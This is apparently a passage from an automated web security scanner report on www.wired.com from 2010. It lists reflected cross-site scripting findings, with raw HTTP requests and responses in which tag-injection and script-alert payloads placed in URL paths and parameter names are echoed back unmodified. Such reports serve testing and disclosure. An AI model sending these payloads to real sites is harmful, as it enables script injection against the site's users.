<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c45a8"><a>9f611b39064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec45a8"><a>9f611b39064/education HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:03 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec45a8"><a>9f611b39064 ss_education"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c85"><a>d84992dbbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/educationb2c85"><a>d84992dbbe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29261 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:27 GMT Date: Sun, 21 Nov 2010 23:06:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_educationb2c85"><a>d84992dbbe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4cf"><a>703cee33c83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureaf4cf"><a>703cee33c83/lifestyle HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:04 GMT Date: Sun, 21 Nov 2010 23:06:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureaf4cf"><a>703cee33c83 ss_lifestyle"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f876e"><a>59992d190ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestylef876e"><a>59992d190ca HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=588 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestylef876e"><a>59992d190ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a99"><a>d3ff9573830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture95a99"><a>d3ff9573830/lifestyle/multimedia/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture95a99"><a>d3ff9573830 ss_lifestyle c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904b7"><a>ee778010cae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle904b7"><a>ee778010cae/multimedia/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:37 GMT Date: Sun, 21 Nov 2010 23:06:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle904b7"><a>ee778010cae c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a306"><a>ecc32f97413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/multimedia4a306"><a>ecc32f97413/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:55 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_multimedia4a306"><a>ecc32f97413"> ...[SNIP]...
1.101. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e513"><script>alert(1)</script>0b37a4181f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca90b"><a>e339c09d9c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureca90b"><a>e339c09d9c5/lifestyle/multimedia/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureca90b"><a>e339c09d9c5 ss_lifestyle c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42d5a"><a>f39aa6a9d07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle42d5a"><a>f39aa6a9d07/multimedia/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:36 GMT Date: Sun, 21 Nov 2010 23:06:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle42d5a"><a>f39aa6a9d07 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8a"><a>c696540734e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/multimedia31c8a"><a>c696540734e/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:51 GMT Date: Sun, 21 Nov 2010 23:06:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_multimedia31c8a"><a>c696540734e"> ...[SNIP]...
1.105. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cdb"><script>alert(1)</script>0fe75b71068 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:17 GMT Date: Sun, 21 Nov 2010 23:06:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127a6"><a>a9774cc0e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture127a6"><a>a9774cc0e66/lifestyle/news/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture127a6"><a>a9774cc0e66 ss_lifestyle c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a43"><a>9a2824aad23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle62a43"><a>9a2824aad23/news/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:35 GMT Date: Sun, 21 Nov 2010 23:06:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle62a43"><a>9a2824aad23 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c9a"><a>b4bd5c0f5f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/newsf6c9a"><a>b4bd5c0f5f4/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:52 GMT Date: Sun, 21 Nov 2010 23:06:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_newsf6c9a"><a>b4bd5c0f5f4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bee7"><a>1f9ffde2136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture3bee7"><a>1f9ffde2136/lifestyle/news/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture3bee7"><a>1f9ffde2136 ss_lifestyle c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d26d"><a>83866788be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle1d26d"><a>83866788be7/news/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:40 GMT Date: Sun, 21 Nov 2010 23:06:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle1d26d"><a>83866788be7 c_news"> ...[SNIP]...
